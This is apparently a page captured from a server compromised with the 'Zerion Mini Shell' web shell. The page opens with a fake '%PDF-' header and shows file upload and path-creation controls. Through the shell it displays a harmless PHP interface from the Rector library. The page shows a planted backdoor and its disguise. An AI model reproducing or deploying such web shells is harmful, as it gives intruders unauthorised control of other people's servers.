%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home2/vacivi36/code/vendor/rector/rector/rules/Php80/Contract/
Upload File :
Create Path :
Current File : //home2/vacivi36/code/vendor/rector/rector/rules/Php80/Contract/AttributeDecoratorInterface.php

<?php

declare (strict_types=1);
namespace Rector\Php80\Contract;

use PhpParser\Node\Attribute;
interface AttributeDecoratorInterface
{
    public function getAttributeName() : string;
    public function decorate(Attribute $attribute) : void;
}

Zerion Mini Shell 1.0